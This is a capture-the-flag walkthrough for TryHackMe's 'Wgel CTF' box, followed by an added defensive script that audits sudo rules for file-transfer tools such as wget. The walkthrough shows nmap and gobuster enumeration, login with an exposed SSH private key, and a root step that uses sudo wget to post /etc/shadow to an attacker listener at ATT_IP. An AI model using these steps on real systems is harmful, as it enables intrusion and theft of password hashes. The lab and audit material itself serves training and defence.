Challenges: wgelctf (TryHackMe)


Wgel CTF

Have fun with this easy box.

Answer the questions below

  1. User flag

    nmap -sC -sV IP_Address

    The source code of http://IP_ADDRESS has a comment with the name jessie.

    Looking around the site and enumerating, we find the /sitemap/ path, which has an interesting .ssh folder, and several paths that didn’t have much helpful info.

    gobuster dir -u http://IP_Address/sitemap/ -w /usr/share/wordlists/dirb/common.txt

    We copied the id_rsa into a file and set permissions, then used id_rsa to get low-privilege access as jessie for the user flag.

    ssh -i id_rsa jessie@<TARGET_IP>

    ls

    ls -la ~/Documents

    cat ~/Documents/user_flag.txt

  2. Root flag

    After running sudo -l, my first thought was to check sudo under wget on GTFOBins, but it was a bit complicated. Later on I learned of a different way through this article and GPT.

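    # on the attacking machine: start the listener first
    nc -lvnp 8000

    # on the target: post the file to the listener's port
    sudo wget --post-file=/etc/shadow http://ATT_IP:8000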

    ls

    cat root_flag.txt
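
From the defender's side, the root step above depends on a sudo rule that lets a user run wget as root. The following is an added example, not part of the original writeup, that audits `sudo -l` output for such rules and generalises from wget to other file-transfer tools. The tool list, the HIGH/MED labels and the sample output are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example: audit `sudo -l` output for rules that run a file-transfer
# tool as root. RISKY is an assumed, non-exhaustive list; wget is the
# binary used in this writeup. ALL is included because it covers every command.
RISKY="ALL wget curl scp rsync ftp tftp"

# Constructed sample of `sudo -l` output (user and host names are made up).
sample_sudo_l() {
cat <<'EOF'
Matching Defaults entries for alice on web01:
    env_reset, mail_badpass

User alice may run the following commands on web01:
    (ALL : ALL) ALL
    (root) NOPASSWD: /usr/bin/wget
    (root) /usr/bin/rsync, /bin/ls
EOF
}

# Reads `sudo -l` output on stdin; prints "<severity> <binary> <command>".
# HIGH = NOPASSWD (usable by anyone holding the session, e.g. via a stolen
# SSH key); MED = the account password is still required.
audit_sudo_list() {
    awk -v risky="$RISKY" '
        BEGIN { n = split(risky, r, " "); for (i = 1; i <= n; i++) bad[r[i]] = 1 }
        /^[ \t]*\(/ {                               # rule lines start with "(runas)"
            sev = ($0 ~ /NOPASSWD:/) ? "HIGH" : "MED"
            cmds = $0
            sub(/^[ \t]*\([^)]*\)[ \t]*/, "", cmds) # drop the (runas) part
            gsub(/[A-Z_]+:[ \t]*/, "", cmds)        # drop tags such as NOPASSWD:
            m = split(cmds, c, /,[ \t]*/)
            for (j = 1; j <= m; j++) {
                split(c[j], w, " ")                 # w[1] is the command path
                k = split(w[1], p, "/")             # p[k] is its basename
                if (k > 0 && (p[k] in bad)) print sev, p[k], w[1]
            }
        }'
}

sample_sudo_l | audit_sudo_list
```

On a real host, pipe `sudo -l -U <user>` into `audit_sudo_list` for each account; any HIGH line is a rule to remove or replace with a narrowly scoped wrapper.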